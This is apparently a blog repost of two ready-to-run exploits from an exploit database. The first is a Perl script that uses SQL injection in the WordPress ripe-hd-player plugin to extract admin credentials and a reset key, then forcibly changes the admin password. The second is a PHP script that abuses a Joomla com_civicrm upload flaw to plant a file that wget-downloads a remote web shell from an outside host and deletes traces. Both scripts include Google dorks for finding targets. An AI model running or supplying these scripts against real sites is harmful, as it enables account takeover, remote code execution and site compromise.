Injector Exploit Database (WordPress & Joomla)

1. WordPress hd-player 0day Exploit

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0               I'm Caddy-dz member from Inj3ct0r Team                 1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
   
####
 
# Exploit Title: WordPress hd-player 0day Exploit
 
# Author: Caddy-Dz
 
# Facebook Page: http://www.facebook.com/Algerian.Cyber.Army
 
# E-mail: noface_x@hotmail.com
 
# Download : http://www.mediafire.com/?62orbd63loc6us0
 
# Category:: webapps
 
# Google Dork: inurl:"/wp-content/plugins/ripe-hd-player
 
# Security Risk: High
 
# Tested on: Ubuntu
 
####
 
#
 
# Greets : 1337day Team , NoFace, Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 , The Unknown , Fawzi Cold-Fire
 
# .. The Crazy 3D Team , Kha&mix , King Of Pirates , xDZx-Team ... and all Indonesian hackers .
 
#
 
# this was written for educational purpose only. use it at your own risk.
 
# author will be not responsible for any damage caused! user assumes all responsibility
 
# intended for authorized web application pentesting only!
 
 
 
 
 
#####################################################################################################
 
# >>> sqli vulnerability discovered in the same plugin and posted ; http://1337day.com/exploit/20199
 
# this exploit was written to develope this vulnerability to get full access of the wordpress script
 
# and bypassing the hash password into a constant password = caddy
 
#####################################################################################################
 
 
 
use IO::Socket;
 
use LWP::Simple;
 
use LWP::UserAgent;
 
 
 
system('cls');
 
system('color a');
 
   
 
   
 
if(@ARGV < 2)
 
{
 
print "[-]How To Use\n\n";
 
&help; exit();
 
}
 
sub help()
 
{
 
print "[+] usage1 : perl $0 site.com / \n";
 
print "[+] usage2 : perl $0 site.com /path/ \n";
 
print "[+] Note ! : do not use (http://) and leave space between the host and (/) \n or the path like the exemple";
 
}
 
   
 
print  "\n****************************************************\n";
 
print  "\n*                coded by Caddy-Dz                 *\n";
 
print  "\n*          email: noface_x[at]hotmail.com          *\n";
 
print  "\n* Fb Page: http://facebook.com/Algerian.Cyber.Army *\n";
 
print  "\*****************************************************\n";
 
($Target, $path,$file_vuln, $sql_query,) = @ARGV;
 
  
 
my $file_vuln = "/wp-content/plugins/ripe-hd-player/config.php?id=-3";
my $sql_query = '+/**/UNION/**/+/**/SELECT/**/+1,2,concat(0x23,user_login,0x3a,user_pass,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+wp_users--';
my $url = "http://" . $Target . $path . $file_vuln . $sql_query;
print "\n wait!!! \n\n";
 
   
 
my $request   = HTTP::Request->new(GET=>$url);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
 
my $response  = $useragent->request($request);
my ($username,$password);
if ($response->is_success) {
 
my $res   = $response->content;
if ($res =~ m/[#](.*):(.*)[#]/g) {
 
($username,$password) = ($1,$2);
 
print "[+] username and password :\n\n$username:$password \n\n";
 
}
 
else { print "[-] Error, Fail to get admin login.\n\n"; }
 
}
 
else { print "[-] Error, ".$response->status_line."\n\n";
 
}
 
 
 
 
 
my $activation = 'http://' . $Target . $path . 'wp-login.php?action=lostpassword';
sub post_url {
 
my( $activation, $formref ) = @_;
 
my $ua = new LWP::UserAgent(timeout => 300);
$ua->agent('perlproc/1.0');
my $get = $ua->post($activation, $formref );
}
 
my %param = ( 'user_login' => $username , 'wp-submit' => 'Get New Password' ); # you must change the parametre "Get New Password" if you're using other wordpress language version
 
print post_url( $activation, \%param );
 
 
my $sql_activation = "http://" . $Target . $path . "wp-content/plugins/ripe-hd-player/config.php?id=-3+/**/UNION/**/+/**/SELECT/**/+1,2,concat(0x23,user_activation_key,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+wp_users--";
my $request3   = HTTP::Request->new(GET=>$sql_activation);
 
my $useragent = LWP::UserAgent->new();
 
$useragent->timeout(10);
 
my $response2  = $useragent->request($request3);
my ($key);
if ($response2->is_success) {
 
my $res2   = $response2->content;
 
if ($res2 =~ m/[#](.*)[#]/g) {
 
($key) = ($1);
 
print "[+] user activation key : \n\n$key \n\n";
 
}
 
else { print "[-] Error, Fail to get user key.\n\n"; }
 
}
 
else { print "[-] Error, ".$response->status_line."\n\n";
 
}
 
 
my $link2 = "http://" . $Target . $path . "wp-login.php?action=rp&key=" . $key . "&login=" .$username;
use strict;
 
sub post_url {
 
my( $link2, $formref ) = @_;
 
my $ua2 = new LWP::UserAgent(timeout => 300);
 
 
 
$ua2->agent('perlproc/1.0');
 
 
 
my $get2 = $ua2->post($link2, $formref );
 
 
 
if( $get2->is_success ){
 
print "\nPassword bypassed and changed to => caddy \n";
 
} else {
 
print status_line;
 
 
 
}
 
}
my %param = ( 'pass1' => 'caddy', 'pass2' => 'caddy', 'wp-submit' => 'Reset Password' ); # you must change the parametre "Reset Password" if you're using other wordpress language version
 
print post_url( $link2, \%param );
 
# F2F77DA8172F8658   1337day.com [2013-05-21]   D97CD14F4A1FE01C #

==============================================================

2. Joomla component com_civicrm remote code injection vulnerability

# Exploit Title: joomla component com_civicrm remode code injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org
 
<?php
   
# Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit
# http://www.securityweb.org & http://www.security.biz.tr
# multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php
   
    
   
$options = getopt('u:f:');
   
if(!isset($options['u'], $options['f']))
die("\n        Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/    The full path to Joomla!
-f post.php             The name of the file to create.\n"); 
   
$url     =  $options['u'];
$file    =  $options['f'];
 
 
$shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}";
$url   = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}";
 
   
$data      = '<?php
 system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");
 system("cp post.php ../../../../../../../tmp/post.php");
 system("cd ..; rm -rf tmp-upload-images");
 echo "by iskorpitx" ;
 fclose ( $handle );
 ?>';
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
   
   
echo "        [+] Submitting request to: {$options['u']}\n";
   
   
$handle = curl_init();
   
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
   
$source = curl_exec($handle);
curl_close($handle);
   
   
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$shell}?cmd=system('id');\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}
    
?>
 
# 2CF4D1BF882F7547   1337day.com [2013-05-21]   C248C940C9C6067B #

Wasallam…

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s